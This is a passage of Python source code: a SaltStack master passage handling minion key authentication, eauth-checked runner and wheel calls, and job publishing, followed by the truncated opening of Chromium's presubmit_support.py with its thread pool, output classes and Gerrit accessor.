key_path = None if key_path is not None: # Write the key to the appropriate location with salt.utils.fopen(key_path, 'w+') as fp_: fp_.write(load['pub']) ret = {'enc': 'clear', 'load': {'ret': key_result}} eload = {'result': key_result, 'act': key_act, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret elif os.path.isfile(pubfn_pend): # This key is in the pending dir and is awaiting acceptance if auto_reject: # We don't care if the keys match, this minion is being # auto-rejected. Move the key file from the pending dir to the # rejected dir. try: shutil.move(pubfn_pend, pubfn_rejected) except (IOError, OSError): pass log.info('Pending public key for {id} rejected via ' 'autoreject_file'.format(**load)) ret = {'enc': 'clear', 'load': {'ret': False}} eload = {'result': False, 'act': 'reject', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret elif not auto_sign: # This key is in the pending dir and is not being auto-signed. # Check if the keys are the same and error out if this is the # case. Otherwise log the fact that the minion is still # pending. if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'key in pending did not match. This may be an ' 'attempt to compromise the Salt cluster.' .format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} else: log.info( 'Authentication failed from host {id}, the key is in ' 'pending and needs to be accepted with salt-key ' '-a {id}'.format(**load) ) eload = {'result': True, 'act': 'pend', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': True}} else: # This key is in pending and has been configured to be # auto-signed. Check to see if it is the same key, and if # so, pass on doing anything here, and let it get automatically # accepted below. if salt.utils.fopen(pubfn_pend, 'r').read() != load['pub']: log.error( 'Authentication attempt from {id} failed, the public ' 'keys in pending did not match. This may be an ' 'attempt to compromise the Salt cluster.' .format(**load) ) # put denied minion key into minions_denied with salt.utils.fopen(pubfn_denied, 'w+') as fp_: fp_.write(load['pub']) eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} else: pass else: # Something happened that I have not accounted for, FAIL! 
log.warn('Unaccounted for authentication failure') eload = {'result': False, 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return {'enc': 'clear', 'load': {'ret': False}} log.info('Authentication accepted from {id}'.format(**load)) # only write to disk if you are adding the file, and in open mode, # which implies we accept any key from a minion (key needs to be # written every time because what's on disk is used for encrypting) if not os.path.isfile(pubfn) or self.opts['open_mode']: with salt.utils.fopen(pubfn, 'w+') as fp_: fp_.write(load['pub']) pub = None # The key payload may sometimes be corrupt when using auto-accept # and an empty request comes in try: pub = RSA.load_pub_key(pubfn) except RSA.RSAError as err: log.error('Corrupt public key "{0}": {1}'.format(pubfn, err)) return {'enc': 'clear', 'load': {'ret': False}} ret = {'enc': 'pub', 'pub_key': self.master_key.get_pub_str(), 'publish_port': self.opts['publish_port'], } if self.opts['auth_mode'] >= 2: if 'token' in load: try: mtoken = self.master_key.key.private_decrypt(load['token'], 4) aes = '{0}_|-{1}'.format(self.opts['aes'], mtoken) except Exception: # Token failed to decrypt, send back the salty bacon to # support older minions pass else: aes = self.opts['aes'] ret['aes'] = pub.public_encrypt(aes, 4) else: if 'token' in load: try: mtoken = self.master_key.key.private_decrypt( load['token'], 4 ) ret['token'] = pub.public_encrypt(mtoken, 4) except Exception: # Token failed to decrypt, send back the salty bacon to # support older minions pass aes = self.opts['aes'] ret['aes'] = pub.public_encrypt(self.opts['aes'], 4) # Be aggressive about the signature digest = hashlib.sha256(aes).hexdigest() ret['sig'] = self.master_key.key.private_encrypt(digest, 5) eload = {'result': True, 'act': 'accept', 'id': load['id'], 'pub': load['pub']} self.event.fire_event(eload, tagify(prefix='auth')) return ret def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth if 'token' in clear_load: try: token = self.loadauth.get_tok(clear_load['token']) except Exception as exc: msg = 'Exception occurred when generating auth token: {0}'.format( exc) log.error(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if not token: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['eauth'] not in self.opts['external_auth']: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['name'] not in self.opts['external_auth'][token['eauth']]: msg = 'Authentication failure of type "token" occurred.' 
log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) good = self.ckminions.runner_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "token" occurred for ' 'user {0}.').format(token['name']) log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.async( fun, clear_load.get('kwarg', {}), token['name']) except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) if 'eauth' not in clear_load: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: name = self.loadauth.load_name(clear_load) if not (name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']]): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if not self.loadauth.time_auth(clear_load): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) good = self.ckminions.runner_check( self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][clear_load['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.async(fun, clear_load.get('kwarg', {}), clear_load.get('username', 'UNKNOWN')) except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) except Exception as exc: log.error( 'Exception occurred in the runner system: {0}'.format(exc) ) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' # All wheel ops pass through eauth if 'token' in clear_load: try: token = self.loadauth.get_tok(clear_load['token']) except Exception as exc: msg = 'Exception occurred when generating auth token: {0}'.format( exc) log.error(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if not token: msg = 'Authentication failure of type "token" occurred.' 
log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['eauth'] not in self.opts['external_auth']: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) if token['name'] not in self.opts['external_auth'][token['eauth']]: msg = 'Authentication failure of type "token" occurred.' log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) good = self.ckminions.wheel_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "token" occurred for ' 'user {0}.').format(token['name']) log.warning(msg) return dict(error=dict(name='TokenAuthenticationError', message=msg)) jid = salt.utils.gen_jid() fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': token['name']} try: self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, **clear_load) data['return'] = ret data['success'] = True self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error(exc) log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} if 'eauth' not in clear_load: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) try: name = self.loadauth.load_name(clear_load) if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) if not self.loadauth.time_auth(clear_load): msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) good = self.ckminions.wheel_check( self.opts['external_auth'][clear_load['eauth']][name] if name in self.opts['external_auth'][clear_load['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun']) if not good: msg = ('Authentication failure of type "eauth" occurred for ' 'user {0}.').format(clear_load.get('username', 'UNKNOWN')) log.warning(msg) return dict(error=dict(name='EauthAuthenticationError', message=msg)) jid = salt.utils.gen_jid() fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': clear_load.get('username', 'UNKNOWN')} try: self.event.fire_event(data, 
tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, **clear_load) data['return'] = ret data['success'] = True self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error('Exception occurred while ' 'introspecting {0}: {1}'.format(fun, exc)) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: log.error( 'Exception occurred in the wheel system: {0}'.format(exc) ) return dict(error=dict(name=exc.__class__.__name__, args=exc.args, message=exc.message)) def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. ''' if 'eauth' not in clear_load: log.warning('Authentication failure of type "eauth" occurred.') return '' if clear_load['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail log.warning('Authentication failure of type "eauth" occurred.') return '' try: name = self.loadauth.load_name(clear_load) if not ((name in self.opts['external_auth'][clear_load['eauth']]) | ('*' in self.opts['external_auth'][clear_load['eauth']])): log.warning('Authentication failure of type "eauth" occurred.') return '' if not self.loadauth.time_auth(clear_load): log.warning('Authentication failure of type "eauth" occurred.') return '' return self.loadauth.mk_token(clear_load) except Exception as exc: log.error( 'Exception occurred while authenticating: {0}'.format(exc) ) return '' def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' extra = clear_load.get('kwargs', {}) # check blacklist/whitelist good = True # Check if the user is blacklisted for user_re in self.opts['client_acl_blacklist'].get('users', []): if re.match(user_re, clear_load['user']): good = False break # check if the cmd is blacklisted for module_re in self.opts['client_acl_blacklist'].get('modules', []): # if this is a regular command, its a single function if type(clear_load['fun']) == str: funs_to_check = [clear_load['fun']] # if this a compound function else: funs_to_check = clear_load['fun'] for fun in funs_to_check: if re.match(module_re, fun): good = False break if good is False: log.error( '{user} does not have permissions to run {function}. 
Please ' 'contact your local administrator if you believe this is in ' 'error.\n'.format( user=clear_load['user'], function=clear_load['fun'] ) ) return '' # to make sure we don't step on anyone else's toes del good # Check for external auth calls if extra.get('token', False): # A token was passed, check it try: token = self.loadauth.get_tok(extra['token']) except Exception as exc: log.error( 'Exception occurred when generating auth token: {0}'.format( exc ) ) return '' if not token: log.warning('Authentication failure of type "token" occurred.') return '' if token['eauth'] not in self.opts['external_auth']: log.warning('Authentication failure of type "token" occurred.') return '' if not ((token['name'] in self.opts['external_auth'][token['eauth']]) | ('*' in self.opts['external_auth'][token['eauth']])): log.warning('Authentication failure of type "token" occurred.') return '' good = self.ckminions.auth_check( self.opts['external_auth'][token['eauth']][token['name']] if token['name'] in self.opts['external_auth'][token['eauth']] else self.opts['external_auth'][token['eauth']]['*'], clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "token" occurred.' ) return '' clear_load['user'] = token['name'] log.debug('Minion tokenized user = "{0}"'.format(clear_load['user'])) elif 'eauth' in extra: if extra['eauth'] not in self.opts['external_auth']: # The eauth system is not enabled, fail log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' try: name = self.loadauth.load_name(extra) if not ((name in self.opts['external_auth'][extra['eauth']]) | ('*' in self.opts['external_auth'][extra['eauth']])): log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' if not self.loadauth.time_auth(extra): log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' except Exception as exc: log.error( 'Exception occurred while authenticating: {0}'.format(exc) ) return '' auth_list = self.opts['external_auth'][extra['eauth']][name] if name in self.opts['external_auth'][extra['eauth']] else self.opts['external_auth'][extra['eauth']]['*'] # Auth has succeeded, get groups this user is a member of groups = self.loadauth.get_groups(extra) if groups: auth_list = self.ckminions.gather_groups(self.opts['external_auth'][extra['eauth']], groups, auth_list) good = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob') ) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "eauth" occurred.' ) return '' clear_load['user'] = name # Verify that the caller has root on master elif 'user' in clear_load: if clear_load['user'].startswith('sudo_'): # If someone can sudo, allow them to act as root if clear_load.get('key', 'invalid') == self.key.get('root'): clear_load.pop('key') elif clear_load.pop('key') != self.key[self.opts.get('user', 'root')]: log.warning( 'Authentication failure of type "user" occurred.' ) return '' elif clear_load['user'] == self.opts.get('user', 'root'): if clear_load.pop('key') != self.key[self.opts.get('user', 'root')]: log.warning( 'Authentication failure of type "user" occurred.' 
) return '' elif clear_load['user'] == 'root': if clear_load.pop('key') != self.key.get(self.opts.get('user', 'root')): log.warning( 'Authentication failure of type "user" occurred.' ) return '' elif clear_load['user'] == salt.utils.get_user(): if clear_load.pop('key') != self.key.get(clear_load['user']): log.warning( 'Authentication failure of type "user" occurred.' ) return '' else: if clear_load['user'] in self.key: # User is authorised, check key and check perms if clear_load.pop('key') != self.key[clear_load['user']]: log.warning( 'Authentication failure of type "user" occurred.' ) return '' if clear_load['user'] not in self.opts['client_acl']: log.warning( 'Authentication failure of type "user" occurred.' ) return '' good = self.ckminions.auth_check( self.opts['client_acl'][clear_load['user']], clear_load['fun'], clear_load['tgt'], clear_load.get('tgt_type', 'glob')) if not good: # Accept find_job so the CLI will function cleanly if clear_load['fun'] != 'saltutil.find_job': log.warning( 'Authentication failure of type "user" ' 'occurred.' ) return '' else: log.warning( 'Authentication failure of type "user" occurred.' ) return '' else: if clear_load.pop('key') != self.key[salt.utils.get_user()]: log.warning( 'Authentication failure of type "other" occurred.' ) return '' # Retrieve the minions list minions = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob') ) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions } } # Retrieve the jid if not clear_load['jid']: fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) clear_load['jid'] = self.mminion.returners[fstr](nocache=extra.get('nocache', False)) self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, } # Announce the job on the event bus self.event.fire_event(new_job_load, 'new_job') # old dup event self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: try: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load) except KeyError: log.critical( 'The specified returner used for the external job cache ' '"{0}" does not have a save_load function!'.format( self.opts['ext_job_cache'] ) ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"{0}" does not have a save_load function!'.format( self.opts['master_job_cache'] ) ) except Exception: log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. 
# # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'user' in clear_load: log.info( 'User {user} Published command {fun} with jid {jid}'.format( **clear_load ) ) load['user'] = clear_load['user'] else: log.info( 'Published command {fun} with jid {jid}'.format( **clear_load ) ) log.debug('Published command details {0}'.format(load)) payload['load'] = self.crypticle.dumps(load) if self.opts['sign_pub_messages']: master_pem_path = os.path.join(self.opts['pki_dir'], 'master.pem') log.debug("Signing data packet") payload['sig'] = salt.crypt.sign_message(master_pem_path, payload['load']) # Send 0MQ to the publisher context = zmq.Context(1) pub_sock = context.socket(zmq.PUSH) pull_uri = 'ipc://{0}'.format( os.path.join(self.opts['sock_dir'], 'publish_pull.ipc') ) pub_sock.connect(pull_uri) pub_sock.send(self.serial.dumps(payload)) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions } }
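# The tail of publish() above hands the serialized payload to the publisher
# process over a local 0MQ PUSH/PULL pair. A minimal, self-contained sketch of
# that transport pattern (hypothetical socket path and payload, not the
# master's actual publisher loop):
#
#   import zmq
#   context = zmq.Context(1)
#   pull_sock = context.socket(zmq.PULL)              # publisher side binds...
#   pull_sock.bind('ipc:///tmp/publish_pull.ipc')
#   push_sock = context.socket(zmq.PUSH)              # ...publish() connects
#   push_sock.connect('ipc:///tmp/publish_pull.ipc')
#   push_sock.send(b'serialized-payload')
#   assert pull_sock.recv() == b'serialized-payload'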
presubmit_support.py
#!/usr/bin/env python # Copyright (c) 2012 The Chromium Authors. All rights reserved. # Use of this source code is governed by a BSD-style license that can be # found in the LICENSE file. """Enables directory-specific presubmit checks to run at upload and/or commit. """ __version__ = '1.8.0' # TODO(joi) Add caching where appropriate/needed. The API is designed to allow # caching (between all different invocations of presubmit scripts for a given # change). We should add it as our presubmit scripts start feeling slow. import ast # Exposed through the API. import cpplint import cPickle # Exposed through the API. import cStringIO # Exposed through the API. import contextlib import fnmatch # Exposed through the API. import glob import inspect import itertools import json # Exposed through the API. import logging import marshal # Exposed through the API. import multiprocessing import optparse import os # Somewhat exposed through the API. import pickle # Exposed through the API. import random import re # Exposed through the API. import signal import sys # Parts exposed through API. import tempfile # Exposed through the API. import threading import time import traceback # Exposed through the API. import types import unittest # Exposed through the API. import urllib2 # Exposed through the API. import urlparse from warnings import warn # Local imports. import fix_encoding import gclient_utils import git_footers import gerrit_util import owners import owners_finder import presubmit_canned_checks import scm import subprocess2 as subprocess # Exposed through the API. # Ask for feedback only once in program lifetime. _ASKED_FOR_FEEDBACK = False class PresubmitFailure(Exception): pass class CommandData(object): def __init__(self, name, cmd, kwargs, message): self.name = name self.cmd = cmd self.stdin = kwargs.get('stdin', None) self.kwargs = kwargs self.kwargs['stdout'] = subprocess.PIPE self.kwargs['stderr'] = subprocess.STDOUT self.kwargs['stdin'] = subprocess.PIPE self.message = message self.info = None # Adapted from # https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37 # # An object that catches SIGINT sent to the Python process and notices # if processes passed to wait() die by SIGINT (we need to look for # both of those cases, because pressing Ctrl+C can result in either # the main process or one of the subprocesses getting the signal). # # Before a SIGINT is seen, wait(p) will simply call p.wait() and # return the result. Once a SIGINT has been seen (in the main process # or a subprocess, including the one the current call is waiting for), # wait(p) will call p.terminate() and raise ProcessWasInterrupted. 
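#
# A hypothetical use of the module-level handler instantiated below as
# sigint_handler (the command is illustrative only):
#   p = subprocess.Popen(['sleep', '5'], stdout=subprocess.PIPE)
#   stdout, stderr = sigint_handler.wait(p, stdin=None)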
class SigintHandler(object): class ProcessWasInterrupted(Exception): pass sigint_returncodes = {-signal.SIGINT, # Unix -1073741510, # Windows } def __init__(self): self.__lock = threading.Lock() self.__processes = set() self.__got_sigint = False signal.signal(signal.SIGINT, lambda signal_num, frame: self.interrupt()) def __on_sigint(self): self.__got_sigint = True while self.__processes: try: self.__processes.pop().terminate() except OSError: pass def interrupt(self): with self.__lock: self.__on_sigint() def got_sigint(self): with self.__lock: return self.__got_sigint def wait(self, p, stdin): with self.__lock: if self.__got_sigint: p.terminate() self.__processes.add(p) stdout, stderr = p.communicate(stdin) code = p.returncode with self.__lock: self.__processes.discard(p) if code in self.sigint_returncodes: self.__on_sigint() if self.__got_sigint: raise self.ProcessWasInterrupted return stdout, stderr sigint_handler = SigintHandler() class ThreadPool(object): def __init__(self, pool_size=None): self._pool_size = pool_size or multiprocessing.cpu_count() self._messages = [] self._messages_lock = threading.Lock() self._tests = [] self._tests_lock = threading.Lock() self._nonparallel_tests = [] def CallCommand(self, test): """Runs an external program. This function converts invocation of .py files and invocations of "python" to vpython invocations. """ vpython = 'vpython.bat' if sys.platform == 'win32' else 'vpython' cmd = test.cmd if cmd[0] == 'python': cmd = list(cmd) cmd[0] = vpython elif cmd[0].endswith('.py'): cmd = [vpython] + cmd try: start = time.time() p = subprocess.Popen(cmd, **test.kwargs) stdout, _ = sigint_handler.wait(p, test.stdin) duration = time.time() - start except OSError as e: duration = time.time() - start return test.message( '%s exec failure (%4.2fs)\n %s' % (test.name, duration, e)) if p.returncode != 0: return test.message( '%s (%4.2fs) failed\n%s' % (test.name, duration, stdout)) if test.info: return test.info('%s (%4.2fs)' % (test.name, duration)) def AddTests(self, tests, parallel=True): if parallel: self._tests.extend(tests) else: self._nonparallel_tests.extend(tests) def RunAsync(self): self._messages = [] def _WorkerFn(): while True: test = None with self._tests_lock: if not self._tests: break test = self._tests.pop() result = self.CallCommand(test) if result: with self._messages_lock: self._messages.append(result) def _StartDaemon(): t = threading.Thread(target=_WorkerFn) t.daemon = True t.start() return t while self._nonparallel_tests: test = self._nonparallel_tests.pop() result = self.CallCommand(test) if result: self._messages.append(result) if self._tests: threads = [_StartDaemon() for _ in range(self._pool_size)] for worker in threads: worker.join() return self._messages def normpath(path): '''Version of os.path.normpath that also changes backward slashes to forward slashes when not running on Windows. ''' # This is safe to always do because the Windows version of os.path.normpath # will replace forward slashes with backward slashes. 
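  # Illustrative behaviour (hypothetical paths, not from any real checkout):
  #   on POSIX:   normpath('foo//bar/./baz.cc') -> 'foo/bar/baz.cc'
  #   on Windows: normpath('foo/bar//baz.cc')   -> 'foo\\bar\\baz.cc'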
path = path.replace(os.sep, '/') return os.path.normpath(path) def _RightHandSideLinesImpl(affected_files): """Implements RightHandSideLines for InputApi and GclChange.""" for af in affected_files: lines = af.ChangedContents() for line in lines: yield (af, line[0], line[1]) class PresubmitOutput(object): def __init__(self, input_stream=None, output_stream=None): self.input_stream = input_stream self.output_stream = output_stream self.reviewers = [] self.more_cc = [] self.written_output = [] self.error_count = 0 def prompt_yes_no(self, prompt_string): self.write(prompt_string) if self.input_stream: response = self.input_stream.readline().strip().lower() if response not in ('y', 'yes'): self.fail() else: self.fail() def fail(self): self.error_count += 1 def should_continue(self): return not self.error_count def write(self, s): self.written_output.append(s) if self.output_stream: self.output_stream.write(s) def getvalue(self): return ''.join(self.written_output) # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitResult(object): """Base class for result objects.""" fatal = False should_prompt = False def __init__(self, message, items=None, long_text=''): """ message: A short one-line message to indicate errors. items: A list of short strings to indicate where errors occurred. long_text: multi-line text output, e.g. from another tool """ self._message = message self._items = items or [] self._long_text = long_text.rstrip() def handle(self, output): output.write(self._message) output.write('\n') for index, item in enumerate(self._items): output.write(' ') # Write separately in case it's unicode. output.write(str(item)) if index < len(self._items) - 1: output.write(' \\') output.write('\n') if self._long_text: output.write('\n***************\n') # Write separately in case it's unicode. output.write(self._long_text) output.write('\n***************\n') if self.fatal: output.fail() # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitError(_PresubmitResult): """A hard presubmit error.""" fatal = True # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitPromptWarning(_PresubmitResult): """An warning that prompts the user if they want to continue.""" should_prompt = True # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _PresubmitNotifyResult(_PresubmitResult): """Just print something to the screen -- but it's not even a warning.""" pass # Top level object so multiprocessing can pickle # Public access through OutputApi object. class _MailTextResult(_PresubmitResult): """A warning that should be included in the review request email.""" def __init__(self, *args, **kwargs): super(_MailTextResult, self).__init__() raise NotImplementedError() class GerritAccessor(object): """Limited Gerrit functionality for canned presubmit checks to work. To avoid excessive Gerrit calls, caches the results. """ def __init__(self, host): self.host = host self.cache = {} def _FetchChangeDetail(self, issue): # Separate function to be easily mocked in tests. 
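    # A test could stub it out with something like (hypothetical payload):
    #   accessor._FetchChangeDetail = lambda issue: {'status': 'NEW'}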
try: return gerrit_util.GetChangeDetail( self.host, str(issue), ['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS']) except gerrit_util.GerritError as e: if e.http_status == 404: raise Exception('Either Gerrit issue %s doesn\'t exist, or ' 'no credentials to fetch issue details' % issue) raise def GetChangeInfo(self, issue): """Returns labels and all revisions (patchsets) for this issue. The result is a dictionary according to Gerrit REST Api. https://gerrit-review.googlesource.com/Documentation/rest-api.html However, API isn't very clear what's inside, so see tests for example. """ assert issue cache_key = int(issue) if cache_key not in self.cache: self.cache[cache_key] = self._FetchChangeDetail(issue) return self.cache[cache_key] def GetChangeDescription(self, issue, patchset=None): """If patchset is none, fetches current patchset.""" info = self.GetChangeInfo(issue) # info is a reference to cache. We'll modify it here adding description to # it to the right patchset, if it is not yet there. # Find revision info for the patchset we want. if patchset is not None: for rev, rev_info in info['revisions'].iteritems(): if str(rev_info['_number']) == str(patchset): break else: raise Exception('patchset %s doesn\'t exist in issue %s' % ( patchset, issue)) else: rev = info['current_revision'] rev_info = info['revisions'][rev] return rev_info['commit']['message'] def GetDestRef(self, issue): ref = self.GetChangeInfo(issue)['branch'] if not ref.startswith('refs/'): # NOTE: it is possible to create 'refs/x' branch, # aka 'refs/heads/refs/x'. However, this is ill-advised. ref = 'refs/heads/%s' % ref return ref def GetChangeOwner(self, issue): return self.GetChangeInfo(issue)['owner']['email'] def GetChangeReviewers(self, issue, approving_only=True): changeinfo = self.GetChangeInfo(issue) if approving_only: labelinfo = changeinfo.get('labels', {}).get('Code-Review', {}) values = labelinfo.get('values', {}).keys() try: max_value = max(int(v) for v in values) reviewers = [r for r in labelinfo.get('all', []) if r.get('value', 0) == max_value] except ValueError: # values is the empty list reviewers = [] else: reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', []) return [r.get('email') for r in reviewers] class OutputApi(object): """An instance of OutputApi gets passed to presubmit scripts so that they can output various types of results. """ PresubmitResult = _PresubmitResult PresubmitError = _PresubmitError PresubmitPromptWarning = _PresubmitPromptWarning PresubmitNotifyResult = _PresubmitNotifyResult MailTextResult = _MailTextResult def __init__(self, is_committing): self.is_committing = is_committing self.more_cc = [] def AppendCC(self, cc): """Appends a user to cc for this change.""" self.more_cc.append(cc) def PresubmitPromptOrNotify(self, *args, **kwargs): """Warn the user when uploading, but only notify if committing.""" if self.is_committing: return self.PresubmitNotifyResult(*args, **kwargs) return self.PresubmitPromptWarning(*args, **kwargs) def EnsureCQIncludeTrybotsAreAdded(self, cl, bots_to_include, message): """Helper for any PostUploadHook wishing to add CQ_INCLUDE_TRYBOTS. Merges the bots_to_include into the current CQ_INCLUDE_TRYBOTS list, keeping it alphabetically sorted. Returns the results that should be returned from the 